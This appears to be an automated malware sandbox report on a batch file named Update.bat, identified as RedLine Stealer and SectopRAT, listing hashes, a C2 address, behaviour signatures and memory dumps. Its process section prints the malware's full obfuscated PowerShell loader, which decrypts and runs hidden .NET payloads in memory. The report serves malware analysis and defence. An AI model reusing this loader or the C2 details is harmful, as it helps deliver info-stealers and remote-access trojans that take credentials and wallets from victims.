Overview

overview

10

Static

static

1

Update.bat

windows10-1703-x64

10

Update.bat

windows10-2004-x64

10

Update.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    139s
  • max time network
    143s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    19-05-2024 15:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Update.bat

  • Size

    90KB

  • MD5

    3ad42ff8b873ba057e56908c4a9a2830

  • SHA1

    aa377371f4aa319ac8367809229397e8cbe984f9

  • SHA256

    59eeafa1a036a240d2e5ef549ddd90c5cb484f27dfa94a5f1af91a7e13f380b1

  • SHA512

    e8c96bd11670e299f7ffff4bd1bdb5e56ea65051739fb6ade5269a307742a391af4ad1a9fe19828cb8a5422f317cfc1da31788a7e9478725dbb75b5b4ba867c1

  • SSDEEP

    1536:ZSXLurkFJ+8TTbUGxintEI0l5a82Nx7GokVsIwX8ao8vpCoB9r6b38H1xlWlazf:ZSXLuInDintF0ba82NZbX9ManBCipZ

Score
10/10
redlinesectoprathone_-_installerexecutioninfostealerratspywaretrojan

Malware Config

Extracted

Family

redline

Botnet

Hone_-_Installer

C2

above-collect.gl.at.ply.gg:58881

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 1 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Update.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3296
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DxAzrcaVfg2CFRZHSsUJyG7xHfjugn8NiLFpB5y2UPs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fwfLXU0xUC9GptqkwYqYDg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WBdwt=New-Object System.IO.MemoryStream(,$param_var); $LWQNs=New-Object System.IO.MemoryStream; $OazpV=New-Object System.IO.Compression.GZipStream($WBdwt, [IO.Compression.CompressionMode]::Decompress); $OazpV.CopyTo($LWQNs); $OazpV.Dispose(); $WBdwt.Dispose(); $LWQNs.Dispose(); $LWQNs.ToArray();}function execute_function($param_var,$param2_var){ $jOrir=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $lhPuX=$jOrir.EntryPoint; $lhPuX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Update.bat';$zaltw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Update.bat').Split([Environment]::NewLine);foreach ($uVtWj in $zaltw) { if ($uVtWj.StartsWith(':: ')) { $Uifnz=$uVtWj.Substring(3); break; }}$payloads_var=[string[]]$Uifnz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:208

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wkkq44sj.uvt.ps1
    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    Download Submit
  • memory/208-31-0x00000000095F0000-0x00000000095F8000-memory.dmp
    Filesize

    32KB

    Download
  • memory/208-10-0x0000000007F10000-0x0000000008260000-memory.dmp
    Filesize

    3.3MB

    Download
  • memory/208-6-0x0000000073130000-0x000000007381E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/208-5-0x0000000007720000-0x0000000007D48000-memory.dmp
    Filesize

    6.2MB

    Download
  • memory/208-32-0x0000000009630000-0x0000000009642000-memory.dmp
    Filesize

    72KB

    Download
  • memory/208-8-0x0000000007D50000-0x0000000007DB6000-memory.dmp
    Filesize

    408KB

    Download
  • memory/208-9-0x0000000007EA0000-0x0000000007F06000-memory.dmp
    Filesize

    408KB

    Download
  • memory/208-33-0x0000000009640000-0x000000000965E000-memory.dmp
    Filesize

    120KB

    Download
  • memory/208-11-0x0000000008320000-0x000000000833C000-memory.dmp
    Filesize

    112KB

    Download
  • memory/208-37-0x0000000009710000-0x0000000009722000-memory.dmp
    Filesize

    72KB

    Download
  • memory/208-13-0x00000000085E0000-0x0000000008656000-memory.dmp
    Filesize

    472KB

    Download
  • memory/208-3-0x0000000004E50000-0x0000000004E86000-memory.dmp
    Filesize

    216KB

    Download
  • memory/208-24-0x0000000073130000-0x000000007381E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/208-29-0x0000000009E50000-0x000000000A4C8000-memory.dmp
    Filesize

    6.5MB

    Download
  • memory/208-30-0x00000000095B0000-0x00000000095CA000-memory.dmp
    Filesize

    104KB

    Download
  • memory/208-0-0x000000007313E000-0x000000007313F000-memory.dmp
    Filesize

    4KB

    Download
  • memory/208-7-0x0000000007580000-0x00000000075A2000-memory.dmp
    Filesize

    136KB

    Download
  • memory/208-4-0x0000000073130000-0x000000007381E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/208-12-0x0000000008660000-0x00000000086AB000-memory.dmp
    Filesize

    300KB

    Download
  • memory/208-36-0x000000000A4D0000-0x000000000AAD6000-memory.dmp
    Filesize

    6.0MB

    Download
  • memory/208-38-0x0000000009770000-0x00000000097AE000-memory.dmp
    Filesize

    248KB

    Download
  • memory/208-39-0x0000000009930000-0x0000000009A3A000-memory.dmp
    Filesize

    1.0MB

    Download
  • memory/208-46-0x000000000AAE0000-0x000000000ACA2000-memory.dmp
    Filesize

    1.8MB

    Download
  • memory/208-47-0x000000000B1E0000-0x000000000B70C000-memory.dmp
    Filesize

    5.2MB

    Download
  • memory/208-48-0x000000000B710000-0x000000000BC0E000-memory.dmp
    Filesize

    5.0MB

    Download
  • memory/208-49-0x0000000009D60000-0x0000000009DF2000-memory.dmp
    Filesize

    584KB

    Download
  • memory/208-50-0x0000000009E20000-0x0000000009E3E000-memory.dmp
    Filesize

    120KB

    Download
  • memory/208-106-0x0000000073130000-0x000000007381E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/208-107-0x0000000073130000-0x000000007381E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/208-112-0x000000007313E000-0x000000007313F000-memory.dmp
    Filesize

    4KB

    Download
  • memory/208-114-0x0000000073130000-0x000000007381E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/208-115-0x0000000073130000-0x000000007381E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/208-116-0x0000000073130000-0x000000007381E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/208-120-0x0000000073130000-0x000000007381E000-memory.dmp
    Filesize

    6.9MB

    Download